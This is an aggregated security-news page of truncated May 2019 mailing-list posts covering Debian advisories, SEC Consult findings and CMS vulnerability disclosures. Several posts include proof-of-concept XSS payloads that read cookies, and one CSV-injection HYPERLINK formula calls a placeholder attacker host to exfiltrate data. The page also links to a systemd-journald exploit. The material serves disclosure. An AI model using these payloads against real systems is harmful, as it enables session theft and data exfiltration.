Security News

TOR browser / Firefox telemetry data

Full Disclosure - 13 May, 2019 - 13:16

Posted by Bipin Gautam on May 13

POC:

tl;dr

run just Firefox browser / TOR and just nothing

and tcpdump the computing device / network

firewall BLOCK all IP/A names, gradually... that shows up in tcpdump
when you do not using firefox but it connects automatically (if you
block something firefox hops to something else, 3-5+ times )

QUICK FIX:

in address bar:

about:config

search for string:

org

com

mozilla

firefox

google

...?

to start with : almost all... the url...

Re: System Down: A systemd-journald exploit

Bug Traq - 13 May, 2019 - 09:48

Posted by Qualys Security Advisory on May 13

Hi all,

Our systemd-journald exploit for CVE-2018-16865 and CVE-2018-16866 is
now available at:

https://www.qualys.com/2019/05/09/system-down/system-down.tar.gz

It is also attached to this email. A few notes about this exploit:

- It supports several targets by default (vulnerable versions of Debian,
Ubuntu, Fedora, CentOS), and it should be relatively easy to add more
targets.

- When adding a new amd64 target, use the...

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

Bug Traq - 13 May, 2019 - 09:44

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

Full Disclosure - 13 May, 2019 - 08:27

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...

[SECURITY] [DSA 4442-1] ghostscript security update

Bug Traq - 13 May, 2019 - 01:53

Posted by Salvatore Bonaccorso on May 12

-------------------------------------------------------------------------
Debian Security Advisory DSA-4442-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
May 12, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : ghostscript
CVE ID : CVE-2019-3839

A vulnerability...

Cross Site Scripting | WolfCMS v0.8.3.1 and before

Full Disclosure - 10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: WolfCMS v0.8.3.1 and before is vulnerable to cross site
scripting in User Add module for parameter Name.

Impacted URL is http://[your_webserver_ip]/wolfcms/?/admin/user/add

Payload used is "TestXSS><img src=x onmousover=alert(document.cookie)>

Further details: https://github.com/wolfcms/wolfcms/issues/683

Already requested for CVE, yet to receive it.

CSV Injection | Alkacon OpenCMS v10.5.4 and before

Full Disclosure - 10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe&quot;)'

Further details is available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for...

Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before

Full Disclosure - 10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to cross site
scripting in New User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used in PoC is "TestXSS<img+src=x+onmouseover=alert(document.domain)

Further details is available here
https://github.com/alkacon/opencms-core/issues/635

Already requested for CVE, yet to receive...

Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability

Full Disclosure - 10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-open-redirect-vulnerability/

dotCMS v5.1.1 suffers from an Open Redirect Vulnerability, in addition
to many other vulnerabilities that I am still verifying.

The following URL is a proof-of-concept that requires a user to be
logged in. Simply login to the demo before visiting the supplied POC.

Logging into the demo requires you to go to
https://demo.dotcms.com/dotAdmin <...

dotCMS v5.1.1 HTML Injection & XSS Vulnerability

Full Disclosure - 10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-html-injection-xss-vulnerability/

dotCMS v5.1.1 suffers from an HTML injection and XSS vulnerability, in
addition to many other vulnerabilities that I am still verifying.

There's a screenshot available on my blog link above.

To reproduce this vulnerability, simply go to
https://dotcms.com/dotAdmin/ and login with their demo credentials
(username: admin () dotcms com...

dotCMS v5.1.1 Vulnerabilities

Full Disclosure - 10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Hello,

I identified several vulnerabilities in dotCMS v5.1.1 due to vulnerable
open source dependencies.

Full security write up:
http://secureli.com/dotcms-v5-1-1-vulnerable-open-source-dependencies/

The details:

/ROOT/html/js/scriptaculous/prototype.js

↳ prototypejs 1.5.0
prototypejs 1.5.0 has known vulnerabilities: severity: high; CVE:
CVE-2008-7220; http://www.cvedetails.com/cve/CVE-2008-7220/...

Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF,vulnerability via unauthenticated GET Request

Full Disclosure - 10 May, 2019 - 12:14

Posted by David H on May 10

<!--
# Exploit Title: Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF
vulnerability via unauthenticated GET Request
# Date: 05-08-2018
# Exploit Author: David Herrero
# Vendor Homepage: https://www.enghouseinteractive.com
# Software Link:
https://www.enghouseinteractive.com/products/contact-center/contact-center-for-service/
# Version: Enghouse Interactive´s CCSP 7.2.5.102
# Tested on: Windows
# CVE : CVE-2018-8940
# Category:...

WordPress Plugin Form Maker 1.13.3 - SQL Injection

Full Disclosure - 10 May, 2019 - 12:13

Posted by Daniele Scanu on May 10

# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Wordpress 5.1

Description:
In the Form Maker plugin before 1.13.3 for WordPress, it's possible to
achieve SQL injection in the function get_labels_parameters in the file...

SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject

Bug Traq - 10 May, 2019 - 09:29

Posted by SEC Consult Vulnerability Lab on May 10

SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found:...

[SECURITY] [DSA 4441-1] symfony security update

Bug Traq - 10 May, 2019 - 09:27

Posted by Sebastien Delafond on May 10

-------------------------------------------------------------------------
Debian Security Advisory DSA-4441-1 security () debian org
https://www.debian.org/security/ Sebastien Delafond
May 10, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : symfony
CVE ID : CVE-2018-14773 CVE-2018-19789...

[SECURITY] [DSA 4440-1] bind9 security update

Bug Traq - 10 May, 2019 - 09:24

Posted by Moritz Muehlenhoff on May 10

-------------------------------------------------------------------------
Debian Security Advisory DSA-4440-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
May 09, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : bind9
CVE ID : CVE-2018-5743 CVE-2018-5745...

[SECURITY] [DSA 4439-1] postgresql-9.6 security update

Bug Traq - 10 May, 2019 - 09:20

Posted by Moritz Muehlenhoff on May 10

-------------------------------------------------------------------------
Debian Security Advisory DSA-4439-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
May 09, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : postgresql-9.6
CVE ID : CVE-2019-10130

Dean...

SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject

Full Disclosure - 10 May, 2019 - 02:23

Posted by SEC Consult Vulnerability Lab on May 10

SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found:...

Vuln: GitLab CVE-2019-11000 Unspecified Information Disclosure Vulnerability

Security Focus Vulnerabilities - 9 May, 2019 - 23:00
GitLab CVE-2019-11000 Unspecified Information Disclosure Vulnerability

Vuln: Linux Kernel 'net/bluetooth/hidp/sock.c' Local Information Disclosure Vulnerability

Security Focus Vulnerabilities - 9 May, 2019 - 23:00
Linux Kernel 'net/bluetooth/hidp/sock.c' Local Information Disclosure Vulnerability
Syndicate content